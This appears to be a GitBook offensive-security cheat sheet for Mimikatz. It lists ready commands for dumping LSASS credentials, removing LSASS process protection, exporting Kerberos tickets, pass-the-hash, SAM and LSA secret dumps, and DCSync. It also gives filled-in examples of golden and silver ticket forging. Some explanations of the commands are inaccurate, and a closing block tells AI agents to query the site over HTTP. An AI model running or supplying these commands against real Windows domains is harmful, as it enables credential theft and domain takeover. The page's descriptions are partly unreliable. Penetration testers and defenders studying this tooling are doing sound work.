# Mimikatz ## Overview > A little tool to play with Windows security. {% embed url="" %} ## Mimikatz cheat sheet ### Executing Mimikatz #### Binary execution inline ```powershell .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit ``` #### PowerShell in memory ```powershell Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' ``` ### sekurlsa Sekurlsa is a Mimikatz module that can be used to perform various memory-related attacks and extract sensitive information from the LSASS process. #### Extracting cleartext and hashed credentials from LSASS This command extracts plaintext passwords from memory for all logged-in users on the system. ```powershell privilege::debug sekurlsa::logonPasswords ``` #### LSASS running with RunAsPPL {% hint style="warning" %} Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1 ``` reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa ``` {% endhint %} To bypass this we'll have to load the `mimidriver.sys` from the Mimikatz repo. This driver need to be in the same folder from where `mimikatz` is run. ```powershell mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove ``` #### Extracting Kerberos tickets from memory This command extracts Kerberos tickets from memory and saves them to a file. ```powershell sekurlsa::tickets /export ``` {% hint style="info" %} These tickets can then be used for pass-the-ticket attacks or offline password cracking. {% endhint %} #### Perform pass the hash This command generates a new access token for the specified user using a specified NTLM hash. This can be used to bypass authentication on systems where NTLM authentication is used. ```powershell sekurlsa::pth /user: /ntlm: sekurlsa::pth /domain: /user: /ntlm: ``` #### **Loading memory dump file** This command creates a memory dump of the LSASS process and saves it to the specified file. This dump can then be analyzed offline for password cracking or other attacks. ```powershell sekurlsa::minidump ``` ### lsadump The lsadump module in Mimikatz allows for the extraction of sensitive information from the Local Security Authority (LSA) subsystem of the Windows operating system. #### SAM dump This command dumps the SAM (Security Account Manager) database, which contains information about local user accounts and their password hashes. ```powershell lsadump::sam ``` #### LSA dump {% hint style="info" %} * /inject – Inject LSASS to extract credentials * /name – account name for target user account * /id – RID for target user account * /patch – patch LSASS. {% endhint %} This command patches the LSA subsystem to allow for the addition of new users or the modification of existing users without authentication. ```powershell lsadump::lsa /patch ``` This command injects a DLL into the specified service and captures its credentials, which can include plaintext passwords and hashes. ```powershell lsadump::lsa /inject /name: ``` #### LSA cache dump This command dumps cached domain credentials from the LSA subsystem. These credentials can be used to authenticate to other systems on the network. ```powershell lsadump::cache ``` #### LSA dump secrets This command dumps various secrets stored in the LSA subsystem, including cached domain credentials, LSA secrets, and NTLM hashes. ```powershell lsadump::secrets ``` #### DCSync This command retrieves the password hash for a specified user account on a specified domain, allowing an attacker to potentially impersonate the user. ```powershell lsadump::dcsync /user: /domain: ``` ### kerberos #### Golden ticket A Golden Ticket attack is a technique used by attackers to gain persistent access to a Windows domain. It involves the use of a forged Kerberos ticket, which allows an attacker to impersonate any user account in the domain and gain unrestricted access to any resource in the domain. **Obtaining the krbtgt hash** This command injects a DLL into the specified service and captures the credentials of the service account, including the service account's NTLM hash. ```powershell lsadump::lsa /inject /name:krbtgt ``` **Creating the Golden ticket** This command creates a Golden Ticket for the specified user account, using the captured service account's NTLM hash and the domain's krbtgt hash. {% code overflow="wrap" %} ```powershell kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt ``` {% endcode %} {% hint style="info" %} Example: {% code overflow="wrap" %} ```powershell Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` {% endcode %} {% endhint %} #### Silver ticket A Silver Ticket attack is another technique used by attackers to gain access to resources in a Windows domain. It involves the creation of a forged Kerberos ticket for a specific service, allowing an attacker to impersonate the service account and gain access to the resources associated with that service. **Creating the Silver ticket** {% code overflow="wrap" %} ```powershell kerberos::golden /domain:[domain] /sid:[domain sid] /target:[target computer] /service:[service] /rc4:[service account hash/machine account hash] /user:[impersonating user] /ptt ``` {% endcode %} {% hint style="info" %} Example: {% code overflow="wrap" %} ```powershell Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"' ``` {% endcode %} {% endhint %} ### vault Mimikatz includes a module for extracting credentials from the Windows Credential Manager, also known as the "vault". This module is called "vault". ```powershell vault::cred /patch ``` ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rfc1918.gitbook.io/offsec/credential-access/microsoft-windows/mimikatz.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.